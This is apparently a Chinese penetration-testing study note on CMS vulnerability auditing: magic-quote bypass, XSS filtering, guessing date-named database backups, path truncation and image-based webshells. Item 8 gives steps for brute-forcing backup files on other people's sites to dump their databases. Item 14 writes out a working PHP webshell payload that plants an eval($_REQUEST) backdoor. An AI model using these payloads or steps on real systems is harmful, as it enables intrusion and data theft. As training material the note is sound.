网络安全进阶篇（十一章-2） 0day审计思路（下）

					本章内容：对上一章的补充

一、总结

1，一些cms的漏洞仅能在特定的版本中才可以复现

2，php.ini文件修改后，需要重启phpstudy生效

3，如果自己搭建的cms注册一直出现问题的话，可能是session出了问题

4，一个网站的一个地方存在注入，其他地方也会高概率存在注入
	比如，在用户登录处存在注入，那么管理员登录也大概率会存在

5，后台比前台脆弱的多；内网比外网脆弱的多

6，魔术引号的使用范围	（宽字节的核心--绕开魔术引号）

		魔术引号仅仅可以影响get、post、cookie传参
		所以可以通过head传参绕过	//即$_SERVER()获取的头信息
	
					-->		稍微进阶   --->		
		
		一些网站如果支持匿名(游客)评论的，一般都会获取你的IP，
		因为匿名发布一些不良信息，得追查到你

7，	在此补充一下防御xss的方法
		~过滤掉 ' " <  >  这四种符号
		
		~对上述符号进行实体化编码
			即让符号被当作字符串去显示，而不是标签去解析
			这些操作一般都是通过一些函数去完成的，白盒审计注意一下
			
			另外，黑盒测试有html实体编码时，可以直接 ' " < >四种一起输入
			看看哪些符号被过滤了。如果过滤不全的话，可以用事件型xss打进去
			
		例如：
			输出字符	描述		实体名称	实体编号
				<		小于号		  &lt;		   &#60;
				>		大于号		  &gt;		   &#62;
				&		和号		  &amp;		   &#38;
				“		引号		  &quot;	   &#34;

8，后台的漏洞更多，
		比如，有的CMS后台提供备份数据库sql的功能，命名又以时间命名(20200325)
		这个文件若不加限制，普通用户也可以访问。这就很危险
			步骤：
					~找用此cms搭建的网站，
					~白盒审计知道此备份sql的存放位置，如：url/aa/20200325
					~burp对找到的目标网站爆破指定位置url/aa/XXXXXXXX
					~XXXXXXXX可以从20180101~至今
					~爆出文件。下载，用本机的数据库管理程序打开
					~现在你就相当于拖库了目标站点，你可以获取数据库的所有信息
		
		后台的漏洞多的很，这仅仅是抛砖引玉，大家自己去试试更好
	
		本质：后台比前台脆弱的多；内网比外网脆弱的多
					
9，sqlmap的*的本质
		sql的谚语，星号之后众生平等//听着好中二。
			为什么加个*就会实现精准打击呢？		
		
		其本质就是sqlmap会在*的地方进行语句的替换，比如：
		
		url id=1*	-->  	运行的过程就替换为 url id=1 and 1=1等等
		
10，本地测试，不知道自己的传参后 发生了什么
		修改原文件，在下边直接加一行：	
				echo 上一句			//直观的看到传参后发生了什么
		
		//在本地测试，很多东西干就行，没有就自己写一个
		//当然这需要一定的代码功底与经验
		
11，代码功底差，没实战经验怎么办？
		去网上找找已经爆出cms的漏洞，试着复原，跟这人家一步步操作
		操作一两次就熟悉了。
		
12，win系统文件路径长度有限制
		例：C://123/123/123/234/435/。。。。。。/123.txt
		
		如果你这个路径过长，后边的就会被系统扔掉。这个长度具体是256个字符
		即，256后的字符串会被丢弃
		
		~另外，在路径后边加 . 会被去掉即
			123.txt....		最终是   123.txt
	
	综上两条，我们在渗透的过程中我们的传参后，被拼接了别的内容。
	我们就可以同过加 . 的方法让后边开发本意拼接的内容失效

	注意：这个截断问题在php5.2以上的版本已经修复
			本质就是，include等一些函数获取到的长度过长，就会不执行
			
			另外，文件上传的00截断在5.2以上版本也不行。
			修复了 00 被当作终结符的bug。
			多提一句，00 本身就不应该代表截断，本身就是一个bug

13，图片马成功的条件
		1，能传入到服务器且语句没有进行渲染
		2，传入的马被相对于的语言解析了（如php或asp）
		
		一百个网站，有90以上的概率可以上传成功图片马
		但是一万个网站，能有一个被对应语句解析都不错
		
				即文件包含很有必要
				
14，文件包含得到的木马无法直接使用
		即有的图片马无法直接通过文件包含连接菜刀，如需要cookie
		这个时候，phpinfo()是可以执行，即这个地方可以执行语句
		我们让他执行   “写一个一句马” 的语句就行了
		具体代码:
			eval(file_put_contents('8.php','<?php eval($_REQUEST[a])?>'))
			
	进阶：但是如果这个传参有魔术引号过滤，如何办？
		很简单，将我们的图片马的内容直接写上边的代码呀
		即图片马的内容：
			<?php eval(file_put_contents('8.php','<?php eval($_REQUEST[a])?>')) ?>
		这样一执行文件包含，我们的马就被写好了

15，本机测试的一些骚操作
		有时候，我们上传的木马没有解析成功，会不会是我们的木马有问题？
				~找到我们的图片马的位置，
				~直接将文件改为1.php
				~访问这个1.php看看有没有报错
		
			因为是咱们本机测测，思维不要那么局限
				
		题外话，有的图片马在制作的过称之中会发生一些很奇怪的问题导致
		我们的图片马中的代码没有执行。对这种问题，最简单的办法就是
			换一个图片做图片马
		
		另外，有的木马连接不上，也没错误。换别的版本的菜刀试试

寄语：愿星光不负赶路人